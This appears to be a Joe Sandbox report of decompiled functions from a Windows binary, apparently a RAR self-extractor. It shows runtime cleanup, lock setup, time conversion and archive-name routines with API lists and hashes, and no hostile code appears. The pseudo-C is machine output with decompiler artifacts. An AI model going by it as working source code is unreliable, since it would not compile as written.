                • Opcode ID: 02e19b217a7b4c3a7fd8c48899a1f9ad8a06144e37bd1ab22d89de9f054969d5
                • Instruction ID: e47db521f1eb65ae4d150c7101cf2afe9745216cb04bea0e731a97234ea17606
                • Opcode Fuzzy Hash: 02e19b217a7b4c3a7fd8c48899a1f9ad8a06144e37bd1ab22d89de9f054969d5
                • Instruction Fuzzy Hash: AE41A434A0020CEFCF12DF69C885AAFBBA5EF44324F148065EA156B392D7759A21CF91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E003E9955(void* __edx, void* __eflags) {
                				void* __ecx;
                				signed int _t25;
                				void* _t29;
                				signed int _t30;
                				intOrPtr _t31;
                				void* _t35;
                				signed int _t38;
                				signed int _t45;
                				void* _t51;
                				signed short* _t52;
                				void* _t53;
                				signed short* _t55;
                				signed short* _t57;
                				signed short* _t58;
                				void* _t59;
                				void* _t60;
                
                				_t57 =  *(_t59 + 0x10);
                				_push(0x200 + E003F3E13(_t57) * 0xc);
                				_t52 = E003F3E33(0x200 + E003F3E13(_t57) * 0xc);
                				 *(_t59 + 0x10) = _t52;
                				if(_t52 != 0) {
                					E003F6066(_t52, L"<style>body{font-family:\"Arial\";font-size:12;}</style>");
                					_t38 = E003F3E13(_t52);
                					_t60 = _t59 + 0xc;
                					_t25 =  *_t57 & 0x0000ffff;
                					_t55 = _t57;
                					if(_t25 == 0) {
                						L19:
                						_t52[_t38] = 0;
                						L003F3E2E(_t57);
                						return _t52;
                					}
                					_t45 = _t25;
                					 *((intOrPtr*)(_t60 + 0x18)) = 0x20;
                					_t29 = 0xd;
                					_t51 = 0xa;
                					do {
                						if(_t45 != _t29 || _t55[1] != _t51 || _t55[2] != _t29 || _t55[3] != _t51) {
                							if(_t55 <= _t57) {
                								L17:
                								_t52[_t38] = _t45;
                								_t38 = _t38 + 1;
                								goto L18;
                							}
                							_t31 =  *((intOrPtr*)(_t60 + 0x14));
                							if(_t45 != _t31 ||  *((intOrPtr*)(_t55 - 2)) != _t31) {
                								goto L17;
                							} else {
                								E003F6066( &(_t52[_t38]), L"&nbsp;");
                								_t38 = _t38 + 6;
                								goto L16;
                							}
                						} else {
                							_t58 =  &(_t52[_t38]);
                							_t53 = 0xa;
                							while(_t55[3] == _t53) {
                								E003F6066(_t58, L"<br>");
                								_t55 =  &(_t55[2]);
                								_t38 = _t38 + 4;
                								_t35 = 0xd;
                								_t58 =  &(_t58[4]);
                								if(_t55[2] == _t35) {
                									continue;
                								}
                								break;
                							}
                							_t52 =  *(_t60 + 0x10);
                							_t55 =  &(_t55[1]);
                							_t57 =  *(_t60 + 0x1c);
                							L16:
                							_t51 = 0xa;
                						}
                						L18:
                						_t55 =  &(_t55[1]);
                						_t30 =  *_t55 & 0x0000ffff;
                						_t45 = _t30;
                						_t29 = 0xd;
                					} while (_t30 != 0);
                					goto L19;
                				}
                				return _t57;
                			}




















                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen
                • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                • API String ID: 176396367-3743748572
                • Opcode ID: d1884d1e9d53b9ef0360cf023ef0afccd8156fada07c427f20c23696f7f7d5db
                • Instruction ID: a88b8f447b3a42ac98bd378ef1497fcbc2fee84c5f39e225efb3565d5b3c0bb3
                • Opcode Fuzzy Hash: d1884d1e9d53b9ef0360cf023ef0afccd8156fada07c427f20c23696f7f7d5db
                • Instruction Fuzzy Hash: AC31AF7264439596DA32EB519C02B7BB3A4EF90320F61463FF9825B2C0FB65BD4083A5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003FC8A4(intOrPtr _a4) {
                				void* _t18;
                
                				_t45 = _a4;
                				if(_a4 != 0) {
                					E003FC868(_t45, 7);
                					E003FC868(_t45 + 0x1c, 7);
                					E003FC868(_t45 + 0x38, 0xc);
                					E003FC868(_t45 + 0x68, 0xc);
                					E003FC868(_t45 + 0x98, 2);
                					E003F8DCC( *((intOrPtr*)(_t45 + 0xa0)));
                					E003F8DCC( *((intOrPtr*)(_t45 + 0xa4)));
                					E003F8DCC( *((intOrPtr*)(_t45 + 0xa8)));
                					E003FC868(_t45 + 0xb4, 7);
                					E003FC868(_t45 + 0xd0, 7);
                					E003FC868(_t45 + 0xec, 0xc);
                					E003FC868(_t45 + 0x11c, 0xc);
                					E003FC868(_t45 + 0x14c, 2);
                					E003F8DCC( *((intOrPtr*)(_t45 + 0x154)));
                					E003F8DCC( *((intOrPtr*)(_t45 + 0x158)));
                					E003F8DCC( *((intOrPtr*)(_t45 + 0x15c)));
                					return E003F8DCC( *((intOrPtr*)(_t45 + 0x160)));
                				}
                				return _t18;
                			}





                APIs
                  • Part of subcall function 003FC868: _free.LIBCMT ref: 003FC891
                • _free.LIBCMT ref: 003FC8F2
                  • Part of subcall function 003F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?), ref: 003F8DE2
                  • Part of subcall function 003F8DCC: GetLastError.KERNEL32(?,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?,?), ref: 003F8DF4
                • _free.LIBCMT ref: 003FC8FD
                • _free.LIBCMT ref: 003FC908
                • _free.LIBCMT ref: 003FC95C
                • _free.LIBCMT ref: 003FC967
                • _free.LIBCMT ref: 003FC972
                • _free.LIBCMT ref: 003FC97D
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                • Instruction ID: 11901795aaa6e0fe78ed33419b9acb88bb62861c6ae292df574b4f1619039f08
                • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                • Instruction Fuzzy Hash: E6114F715D0B0CAAE622B7B1CD07FEB7BACAF01B40F401C15F39D6E092DA65B9099750
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E003EE5EE() {
                				intOrPtr _t3;
                				_Unknown_base(*)()* _t7;
                				_Unknown_base(*)()* _t10;
                				struct HINSTANCE__* _t15;
                
                				_t3 =  *0x431cd8;
                				if(_t3 == 1) {
                					L11:
                					return 0;
                				}
                				if(_t3 != 0) {
                					return 1;
                				}
                				_t15 = GetModuleHandleW(L"KERNEL32.DLL");
                				if(_t15 != 0) {
                					_t7 = GetProcAddress(_t15, "AcquireSRWLockExclusive");
                					if(_t7 == 0) {
                						goto L3;
                					}
                					 *0x431cdc = _t7;
                					_t10 = GetProcAddress(_t15, "ReleaseSRWLockExclusive");
                					if(_t10 == 0) {
                						goto L3;
                					}
                					 *0x431ce0 = _t10;
                					L7:
                					asm("lock cmpxchg [edx], ecx");
                					if(0 != 0 || _t15 != 1) {
                						return 0xbadbad;
                					} else {
                						goto L11;
                					}
                				}
                				L3:
                				_t15 = 1;
                				goto L7;
                			}








                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,003EE669,003EE5CC,003EE86D), ref: 003EE605
                • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 003EE61B
                • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 003EE630
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                • API String ID: 667068680-1718035505
                • Opcode ID: ee70e841fe5d0e33847a00fc140c6963b258ee323f9d4a6bdc55ad9ca04d919e
                • Instruction ID: fa7ea5bd8ed087dba5a57a9ce36532dc97758a854f3ea852e502fe0a86ff7b62
                • Opcode Fuzzy Hash: ee70e841fe5d0e33847a00fc140c6963b258ee323f9d4a6bdc55ad9ca04d919e
                • Instruction Fuzzy Hash: 89F08B313812F29B8F234F771C84A6722DCAA253463121B3AD905E31E0EB34CC046B9C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E003F8900(signed int __ecx) {
                				intOrPtr _t7;
                
                				asm("lock xadd [eax], ecx");
                				if((__ecx | 0xffffffff) == 0) {
                					_t7 =  *0x40ee90; // 0x2b62370
                					if(_t7 != 0x40ec70) {
                						E003F8DCC(_t7);
                						 *0x40ee90 = 0x40ec70;
                					}
                				}
                				E003F8DCC( *0x432280);
                				 *0x432280 = 0;
                				E003F8DCC( *0x432284);
                				 *0x432284 = 0;
                				E003F8DCC( *0x4326d0);
                				 *0x4326d0 = 0;
                				E003F8DCC( *0x4326d4);
                				 *0x4326d4 = 0;
                				return 1;
                			}





                APIs
                • _free.LIBCMT ref: 003F891E
                  • Part of subcall function 003F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?), ref: 003F8DE2
                  • Part of subcall function 003F8DCC: GetLastError.KERNEL32(?,?,003FC896,?,00000000,?,00000000,?,003FC8BD,?,00000007,?,?,003FCCBA,?,?), ref: 003F8DF4
                • _free.LIBCMT ref: 003F8930
                • _free.LIBCMT ref: 003F8943
                • _free.LIBCMT ref: 003F8954
                • _free.LIBCMT ref: 003F8965
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID: p@
                • API String ID: 776569668-1482256116
                • Opcode ID: b03e88f6c7eb9211aea8a99f85885c5a695e4bf20c4f69b326f249a601cb0d68
                • Instruction ID: 98c9ea24542aa5cb7a1be07e99841d7c47797b957c6c24fe0f59fb83426b9172
                • Opcode Fuzzy Hash: b03e88f6c7eb9211aea8a99f85885c5a695e4bf20c4f69b326f249a601cb0d68
                • Instruction Fuzzy Hash: 6EF0FE7181062A9BC74B6F14FE034263FB1FF257543012966F6146A2F1CBB54951DBC9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E003E146A(signed int* __ecx, void* __edx, intOrPtr* _a4) {
                				char _v16;
                				struct _SYSTEMTIME _v32;
                				struct _SYSTEMTIME _v48;
                				struct _FILETIME _v64;
                				struct _FILETIME _v72;
                				intOrPtr _v76;
                				struct _FILETIME _v84;
                				signed int _t56;
                				signed int _t70;
                				signed int _t72;
                				signed int _t77;
                				signed int _t85;
                				intOrPtr* _t89;
                				signed int _t90;
                				signed int _t92;
                				signed int* _t93;
                
                				_t89 = _a4;
                				_t93 = __ecx;
                				_v48.wYear =  *_t89;
                				_v48.wMonth =  *((intOrPtr*)(_t89 + 4));
                				_v48.wDay =  *((intOrPtr*)(_t89 + 8));
                				_v48.wHour =  *((intOrPtr*)(_t89 + 0xc));
                				_v48.wMinute =  *((intOrPtr*)(_t89 + 0x10));
                				_v48.wSecond =  *((intOrPtr*)(_t89 + 0x14));
                				_v48.wMilliseconds = 0;
                				_v48.wDayOfWeek.wYear = 0;
                				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
                					_t90 = 0;
                					_t77 = 0;
                				} else {
                					if(E003DB146() >= 0x600) {
                						FileTimeToSystemTime( &_v64,  &_v32);
                						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16);
                						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
                						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
                						_t70 = _v84.dwHighDateTime + _v72.dwLowDateTime;
                						asm("sbb eax, [esp+0x24]");
                						asm("sbb eax, esi");
                						asm("adc eax, esi");
                						_t85 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
                						asm("adc eax, esi");
                					} else {
                						LocalFileTimeToFileTime( &_v64,  &_v72);
                						_t70 = _v72.dwHighDateTime.dwLowDateTime;
                						_t85 = _v72.dwLowDateTime;
                					}
                					_t92 = 0x64;
                					_t72 = _t85;
                					_t77 = _t70 * _t92 + (_t72 * _t92 >> 0x20);
                					_t90 = _t72 * _t92;
                				}
                				 *_t93 = _t90;
                				_a4 = _t77;
                				_t56 =  *((intOrPtr*)(_t89 + 0x18)) + _t90;
                				asm("adc ecx, ebx");
                				 *_t93 = _t56;
                				_a4 = 0;
                				return _t56;
                			}




















                APIs
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003E14C2
                  • Part of subcall function 003DB146: GetVersionExW.KERNEL32(?), ref: 003DB16B
                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003E14E6
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 003E1500
                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 003E1513
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003E1523
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 003E1533
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion
                • String ID:
                • API String ID: 2092733347-0
                • Opcode ID: 69b75bb7f0068f5c2d282e72f1ce6a854b711647ec6f01d1e522b106db3497a5
                • Instruction ID: 23e6be6687c9216c6eedda38efa31a4e3e774e3046c487477b9304a0e15d922a
                • Opcode Fuzzy Hash: 69b75bb7f0068f5c2d282e72f1ce6a854b711647ec6f01d1e522b106db3497a5
                • Instruction Fuzzy Hash: AF31E675108355ABC700DFA9C98499BBBE8BF9C714F004A2AF995D3250E730D509CBAA
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E003F2AFA(void* __ecx, void* __edx) {
                				void* _t4;
                				void* _t8;
                				void* _t11;
                				void* _t13;
                				void* _t14;
                				void* _t16;
                				void* _t18;
                				void* _t24;
                				long _t25;
                				void* _t28;
                
                				_t13 = __ecx;
                				if( *0x40e7d0 != 0xffffffff) {
                					_t25 = GetLastError();
                					_t11 = E003F3CCD(_t13, __eflags,  *0x40e7d0);
                					_t14 = _t24;
                					__eflags = _t11 - 0xffffffff;
                					if(_t11 == 0xffffffff) {
                						L5:
                						_t11 = 0;
                					} else {
                						__eflags = _t11;
                						if(__eflags == 0) {
                							_t4 = E003F3D08(_t14, __eflags,  *0x40e7d0, 0xffffffff);
                							_pop(_t16);
                							__eflags = _t4;
                							if(_t4 != 0) {
                								_push(0x28);
                								_t28 = E003F8DC1(_t16);
                								_t18 = 1;
                								__eflags = _t28;
                								if(__eflags == 0) {
                									L8:
                									_t11 = 0;
                									E003F3D08(_t18, __eflags,  *0x40e7d0, 0);
                								} else {
                									_t8 = E003F3D08(_t18, __eflags,  *0x40e7d0, _t28);
                									_pop(_t18);
                									__eflags = _t8;
                									if(__eflags != 0) {
                										_t11 = _t28;
                										_t28 = 0;
                										__eflags = 0;
                									} else {
                										goto L8;
                									}
                								}
                								L003F3E2E(_t28);
                							} else {
                								goto L5;
                							}
                						}
                					}
                					SetLastError(_t25);
                					return _t11;
                				} else {
                					return 0;
                				}
                			}














                APIs
                • GetLastError.KERNEL32(?,?,003F2AF1,003F02FC,003EFA34), ref: 003F2B08
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003F2B16
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003F2B2F
                • SetLastError.KERNEL32(00000000,003F2AF1,003F02FC,003EFA34), ref: 003F2B81
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: 6357f03bb9a6c84db71b3023ff098b5d2738556d289c57c14ab500aea6a9eb14
                • Instruction ID: 06238eda63ba3fa40f6e56d3df40ebe9c5b491033e253337aee742c58bf5a8f0
                • Opcode Fuzzy Hash: 6357f03bb9a6c84db71b3023ff098b5d2738556d289c57c14ab500aea6a9eb14
                • Instruction Fuzzy Hash: 1701D43220D719AEE6172F757D859772F69EF11775B600B3AFB106A1F0EF618C109148
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 69%
                			E003F97E5(void* __ebx, void* __ecx, void* __edx) {
                				void* __edi;
                				void* __esi;
                				intOrPtr _t2;
                				void* _t3;
                				void* _t4;
                				intOrPtr _t9;
                				void* _t11;
                				void* _t20;
                				void* _t21;
                				void* _t23;
                				void* _t25;
                				void* _t27;
                				void* _t29;
                				void* _t30;
                				void* _t31;
                				void* _t32;
                				long _t36;
                				long _t37;
                				void* _t40;
                
                				_t29 = __edx;
                				_t23 = __ecx;
                				_t20 = __ebx;
                				_push(_t30);
                				_t36 = GetLastError();
                				_t2 =  *0x40e7fc; // 0x6
                				_t42 = _t2 - 0xffffffff;
                				if(_t2 == 0xffffffff) {
                					L2:
                					_t3 = E003FB136(_t23, 1, 0x364);
                					_t31 = _t3;
                					_pop(_t25);
                					if(_t31 != 0) {
                						_t4 = E003FAEB1(_t20, _t25, _t31, __eflags,  *0x40e7fc, _t31);
                						__eflags = _t4;
                						if(_t4 != 0) {
                							E003F9649(_t25, _t31, 0x432288);
                							E003F8DCC(0);
                							_t40 = _t40 + 0xc;
                							__eflags = _t31;
                							if(_t31 == 0) {
                								goto L9;
                							} else {
                								goto L8;
                							}
                						} else {
                							_push(_t31);
                							goto L4;
                						}
                					} else {
                						_push(_t3);
                						L4:
                						E003F8DCC();
                						_pop(_t25);
                						L9:
                						SetLastError(_t36);
                						E003F8D24(_t20, _t29, _t31, _t36);
                						asm("int3");
                						_push(_t20);
                						_push(_t36);
                						_push(_t31);
                						_t37 = GetLastError();
                						_t21 = 0;
                						_t9 =  *0x40e7fc; // 0x6
                						_t45 = _t9 - 0xffffffff;
                						if(_t9 == 0xffffffff) {
                							L12:
                							_t32 = E003FB136(_t25, 1, 0x364);
                							_pop(_t27);
                							if(_t32 != 0) {
                								_t11 = E003FAEB1(_t21, _t27, _t32, __eflags,  *0x40e7fc, _t32);
                								__eflags = _t11;
                								if(_t11 != 0) {
                									E003F9649(_t27, _t32, 0x432288);
                									E003F8DCC(_t21);
                									__eflags = _t32;
                									if(_t32 != 0) {
                										goto L19;
                									} else {
                										goto L18;
                									}
                								} else {
                									_push(_t32);
                									goto L14;
                								}
                							} else {
                								_push(_t21);
                								L14:
                								E003F8DCC();
                								L18:
                								SetLastError(_t37);
                							}
                						} else {
                							_t32 = E003FAE5B(0, _t25, _t31, _t45, _t9);
                							if(_t32 != 0) {
                								L19:
                								SetLastError(_t37);
                								_t21 = _t32;
                							} else {
                								goto L12;
                							}
                						}
                						return _t21;
                					}
                				} else {
                					_t31 = E003FAE5B(__ebx, _t23, _t30, _t42, _t2);
                					if(_t31 != 0) {
                						L8:
                						SetLastError(_t36);
                						return _t31;
                					} else {
                						goto L2;
                					}
                				}
                			}

                APIs
                • GetLastError.KERNEL32(?,00411098,003F4674,00411098,?,?,003F40EF,?,?,00411098), ref: 003F97E9
                • _free.LIBCMT ref: 003F981C
                • _free.LIBCMT ref: 003F9844
                • SetLastError.KERNEL32(00000000,?,00411098), ref: 003F9851
                • SetLastError.KERNEL32(00000000,?,00411098), ref: 003F985D
                • _abort.LIBCMT ref: 003F9863
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorLast$_free$_abort
                • String ID:
                • API String ID: 3160817290-0
                • Opcode ID: 7e93a35015f54656b57c778a7d0ecd96b86b895bc3a6bf005c5c74eb8bc14b52
                • Instruction ID: c4e2f2a5502be68617c74e619dcba85218f3c0a96d745436f612dbefcbc040e4
                • Opcode Fuzzy Hash: 7e93a35015f54656b57c778a7d0ecd96b86b895bc3a6bf005c5c74eb8bc14b52
                • Instruction Fuzzy Hash: CEF0A43614060966C7133725BD0AB3B2A698FD27B5F360136F718AA192EE3088014569
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EDC3B(void* _a4) {
                				struct tagMSG _v32;
                				long _t7;
                				long _t10;
                
                				_t7 = WaitForSingleObject(_a4, 0xa);
                				if(_t7 == 0x102) {
                					do {
                						if(PeekMessageW( &_v32, 0, 0, 0, 0) != 0) {
                							GetMessageW( &_v32, 0, 0, 0);
                							TranslateMessage( &_v32);
                							DispatchMessageW( &_v32);
                						}
                						_t10 = WaitForSingleObject(_a4, 0xa);
                					} while (_t10 == 0x102);
                					return _t10;
                				}
                				return _t7;
                			}

                APIs
                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 003EDC47
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 003EDC61
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003EDC72
                • TranslateMessage.USER32(?), ref: 003EDC7C
                • DispatchMessageW.USER32(?), ref: 003EDC86
                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 003EDC91
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                • String ID:
                • API String ID: 2148572870-0
                • Opcode ID: 7269bdc6028c80bbbc66490dbae6c2669f197507208d4f06d697438819efddd7
                • Instruction ID: b1e716d79ab288a8fe074fd152f5fa6c221b256cbfd748f7f8eb4a7a999063a1
                • Opcode Fuzzy Hash: 7269bdc6028c80bbbc66490dbae6c2669f197507208d4f06d697438819efddd7
                • Instruction Fuzzy Hash: D8F08C32A01229BBCB206FA1DD4CDCB7F7CEF41792B004121B50AE20A4D635D646C7A0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003DC0C5(short* _a4, char _a12) {
                				signed short* _v4;
                				void* __ebp;
                				intOrPtr* _t20;
                				signed short* _t24;
                				char _t27;
                				char _t30;
                				signed short* _t31;
                				short _t32;
                				signed int _t33;
                				short _t34;
                				signed short* _t37;
                				char _t39;
                				char _t40;
                				char _t41;
                				intOrPtr _t44;
                				void* _t47;
                				void* _t48;
                				short* _t54;
                				intOrPtr* _t56;
                				signed short _t57;
                				short* _t58;
                				intOrPtr* _t59;
                				signed int _t62;
                				signed short* _t63;
                				short _t66;
                				signed short _t67;
                
                				_t58 = _a4;
                				_t20 = E003DB92D(_t58);
                				_t44 = _a4;
                				_t59 = _t20;
                				_t68 = _t59;
                				if(_t59 != 0) {
                					__eflags =  *((intOrPtr*)(_t59 + 2));
                					if( *((intOrPtr*)(_t59 + 2)) == 0) {
                						L7:
                						__eflags = _t44 - (_t59 - _t58 >> 1);
                						E003E0602(_t59, L".rar", _t44 - (_t59 - _t58 >> 1));
                					} else {
                						_t40 = E003E1FBB(_t59, L".exe");
                						__eflags = _t40;
                						if(_t40 == 0) {
                							goto L7;
                						} else {
                							_t41 = E003E1FBB(_t59, L".sfx");
                							__eflags = _t41;
                							if(_t41 == 0) {
                								goto L7;
                							}
                						}
                					}
                				} else {
                					E003E05DA(_t68, _t58, L".rar", _t44);
                					_t59 = E003DB92D(_t58);
                					if(_t59 == 0) {
                						L2:
                						 *_t58 = 0;
                						return 0;
                					}
                				}
                				_t24 = 0x2e;
                				_v4 = _t24;
                				__eflags =  *_t59 - _t24;
                				if( *_t59 != _t24) {
                					goto L2;
                				}
                				__eflags =  *((intOrPtr*)(_t59 + 2));
                				if( *((intOrPtr*)(_t59 + 2)) == 0) {
                					goto L2;
                				}
                				__eflags = _a12;
                				if(__eflags != 0) {
                					_t12 = _t59 + 4; // 0x4
                					_t65 = _t12;
                					_t27 = E003E047A( *_t12 & 0x0000ffff);
                					__eflags = _t27;
                					if(_t27 == 0) {
                						L30:
                						return E003E0602(_t65, L"00", _t44 - (_t59 - _t58 >> 1) - 2);
                					}
                					_t30 = E003E047A( *(_t59 + 6) & 0x0000ffff);
                					__eflags = _t30;
                					if(_t30 == 0) {
                						goto L30;
                					}
